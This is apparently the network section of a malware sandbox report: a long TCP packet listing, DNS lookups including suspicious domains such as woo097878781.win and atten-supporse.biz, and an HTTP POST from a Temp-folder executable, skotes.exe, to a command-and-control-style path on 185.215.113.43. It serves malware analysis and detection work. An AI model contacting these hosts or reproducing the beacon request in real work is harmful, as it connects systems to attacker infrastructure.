Dec 9, 2024 08:08:59.151009083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.151067972 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.151225090 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.152204990 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.152237892 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.152389050 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.153397083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.153592110 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.153636932 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.154572010 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.154618025 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.154783964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.155761957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.155807018 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.155946970 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.156992912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.157157898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.157170057 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.158123970 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.158178091 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.158324957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.159291983 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.159352064 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.159477949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.160480976 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.160547972 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.160660982 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.161659002 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.161710978 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.161870003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.162854910 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.162947893 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.163063049 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.164027929 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.164087057 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.164216995 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.165261984 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.165364981 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.165389061 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.166384935 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.166577101 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.166605949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.167568922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.167767048 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.167814970 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.168765068 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.168972969 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.169013977 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.169943094 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.169986963 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.170146942 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.171134949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.171183109 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.171320915 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.172322989 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.172373056 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.172497988 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.173502922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.173558950 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.173691034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.174680948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.174863100 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.174915075 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.175878048 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.176084042 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.176126003 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.177048922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.177265882 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.177304029 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.178231001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.178407907 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.178422928 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.179416895 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.179497957 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.179588079 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.180600882 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.180638075 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.180785894 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.181785107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.181821108 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.181981087 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.182972908 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.183152914 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.183207035 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.184144974 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.184287071 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.184324026 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.185339928 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.185388088 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.185528994 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.186517000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.186702013 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.186752081 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.187722921 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.187767029 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.187889099 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.188873053 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.189080000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.189136028 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.191083908 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.191138029 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.191795111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.191979885 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.192030907 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.192341089 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.192729950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.193073034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.193119049 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.193627119 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.193988085 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.194035053 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.194797993 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.194860935 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.194997072 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.195991993 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.196036100 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.196183920 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.197180033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.197232962 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.197370052 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.198378086 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.198525906 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.198601961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.199577093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.199628115 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.199733019 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.200726032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.200800896 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.200931072 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.201910973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.202125072 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.202168941 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.203104973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.203145027 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.203279018 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.204271078 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.204336882 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.204469919 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.205439091 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.205708027 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.205756903 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.206734896 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.206989050 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.207066059 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.207851887 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.207902908 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.208044052 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.209044933 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.209243059 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.209283113 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.210194111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.210376024 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.210417986 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.211352110 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.211441040 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.211561918 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.212553024 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.212604046 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.212754965 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.213732004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.213773966 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.213951111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.215037107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.215080976 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.215334892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.216121912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.216180086 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.216280937 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.217288017 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.217494011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.217535019 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.218481064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.218703985 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.218749046 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.219685078 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.219767094 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.219861031 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.220839977 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.221030951 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.221075058 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.222043037 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.222104073 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.222244978 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.223212957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.223287106 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.223422050 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.224432945 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.224482059 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.224561930 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.225632906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.225881100 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.225931883 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.226816893 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.226876020 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.226963997 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.228040934 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.228178024 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.228204966 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.229116917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.229336977 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.229384899 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.230324030 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.230524063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.230562925 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.231494904 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.231556892 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.231684923 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.232753038 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.232883930 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.232897043 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.233901978 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.234139919 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.234256983 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.235208988 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.235255957 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.235265017 CET	80	49886	185.215.113.16	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 08:08:15.272284031 CET	192.168.2.4	1.1.1.1	0xbb03	Standard query (0)	woo097878781.win	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:19.863998890 CET	192.168.2.4	1.1.1.1	0xf3f5	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:46.323169947 CET	192.168.2.4	1.1.1.1	0x69ac	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:47.253001928 CET	192.168.2.4	1.1.1.1	0x53f8	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 9, 2024 08:08:50.139873981 CET	192.168.2.4	1.1.1.1	0x2e9a	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:50.140273094 CET	192.168.2.4	1.1.1.1	0xc105	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:50.987545967 CET	192.168.2.4	1.1.1.1	0x2d01	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:50.987838984 CET	192.168.2.4	1.1.1.1	0xbe14	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.126075029 CET	192.168.2.4	1.1.1.1	0xdc2e	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 9, 2024 08:08:51.127219915 CET	192.168.2.4	1.1.1.1	0xc46b	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 9, 2024 08:08:51.474057913 CET	192.168.2.4	1.1.1.1	0x839f	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.486558914 CET	192.168.2.4	1.1.1.1	0x396e	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.623470068 CET	192.168.2.4	1.1.1.1	0xb783	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.635699987 CET	192.168.2.4	1.1.1.1	0xaeaf	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.635993958 CET	192.168.2.4	1.1.1.1	0xbfb0	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.803574085 CET	192.168.2.4	1.1.1.1	0xa148	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 9, 2024 08:08:51.803869009 CET	192.168.2.4	1.1.1.1	0x7ef9	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 9, 2024 08:08:51.804527998 CET	192.168.2.4	1.1.1.1	0x3e3b	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 9, 2024 08:08:52.246157885 CET	192.168.2.4	1.1.1.1	0xf316	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:52.406363010 CET	192.168.2.4	1.1.1.1	0x603	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:52.557265043 CET	192.168.2.4	1.1.1.1	0x4669	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 9, 2024 08:08:53.301956892 CET	192.168.2.4	1.1.1.1	0xb6ae	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:53.302323103 CET	192.168.2.4	1.1.1.1	0xc97	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:53.323951960 CET	192.168.2.4	1.1.1.1	0xc78b	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 08:08:15.674891949 CET	1.1.1.1	192.168.2.4	0xbb03	No error (0)	woo097878781.win		154.216.20.243	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:20.177756071 CET	1.1.1.1	192.168.2.4	0xf3f5	No error (0)	atten-supporse.biz		104.21.16.9	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:20.177756071 CET	1.1.1.1	192.168.2.4	0xf3f5	No error (0)	atten-supporse.biz		172.67.165.166	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:46.318624020 CET	1.1.1.1	192.168.2.4	0xa5a3	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:46.626060009 CET	1.1.1.1	192.168.2.4	0xa5a3	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:46.766315937 CET	1.1.1.1	192.168.2.4	0xa5a3	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:47.200206995 CET	1.1.1.1	192.168.2.4	0x69ac	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:50.276774883 CET	1.1.1.1	192.168.2.4	0xc105	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 08:08:50.276774883 CET	1.1.1.1	192.168.2.4	0xc105	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:50.276948929 CET	1.1.1.1	192.168.2.4	0x2e9a	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.125242949 CET	1.1.1.1	192.168.2.4	0xbe14	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.125339031 CET	1.1.1.1	192.168.2.4	0x2d01	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.264602900 CET	1.1.1.1	192.168.2.4	0xdc2e	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 9, 2024 08:08:51.266092062 CET	1.1.1.1	192.168.2.4	0xc46b	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 9, 2024 08:08:51.619851112 CET	1.1.1.1	192.168.2.4	0x839f	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.629333973 CET	1.1.1.1	192.168.2.4	0xea29	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 08:08:51.629333973 CET	1.1.1.1	192.168.2.4	0xea29	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.632133961 CET	1.1.1.1	192.168.2.4	0x396e	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 08:08:51.632133961 CET	1.1.1.1	192.168.2.4	0x396e	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.797317028 CET	1.1.1.1	192.168.2.4	0xb783	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.797343969 CET	1.1.1.1	192.168.2.4	0xaeaf	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:51.797373056 CET	1.1.1.1	192.168.2.4	0xbfb0	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:52.383028984 CET	1.1.1.1	192.168.2.4	0xf316	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 08:08:52.383028984 CET	1.1.1.1	192.168.2.4	0xf316	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 08:08:52.383028984 CET	1.1.1.1	192.168.2.4	0xf316	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:52.543551922 CET	1.1.1.1	192.168.2.4	0x603	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:52.694875002 CET	1.1.1.1	192.168.2.4	0x4669	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Dec 9, 2024 08:08:53.438875914 CET	1.1.1.1	192.168.2.4	0xb6ae	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:53.439402103 CET	1.1.1.1	192.168.2.4	0xc97	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:53.439402103 CET	1.1.1.1	192.168.2.4	0xc97	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:08:53.462379932 CET	1.1.1.1	192.168.2.4	0xc78b	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 08:08:53.462379932 CET	1.1.1.1	192.168.2.4	0xc78b	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49754	185.215.113.43	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:04.371292114 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
